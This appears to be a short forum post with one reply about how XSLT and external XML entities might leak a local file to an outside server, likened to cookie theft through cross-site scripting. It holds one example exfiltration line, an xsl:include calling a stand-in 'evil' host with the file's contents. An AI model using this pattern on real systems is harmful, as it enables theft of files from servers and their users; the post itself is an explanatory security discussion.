3 ms·
Strange things can sometimes be done with XSLT, for example by using external entities. An external entity can be a file that stores part of a DTD or something
by infinity 15y ago
Strange things can sometimes be done with XSLT, for example by using external entities. An external entity can be a file that stores part of a DTD or something else. It could be an interesting file on your system, say we call it something like 'blah'. Then we can send &blah; to our evil server:
<xsl:include href="hxxp://evil.example.com/hello?&blah; />
This is similar to stealing cookies with JavaScript through a cross-site scripting vulnerability by adding a new image to the page, hotlinked from an evil server and passing cookie information as a parameter.
- mike-cardwell 15y agoI am right in thinking that there aren't any known exploits of this variety though right? Why is XSLT more dangerous than HTML?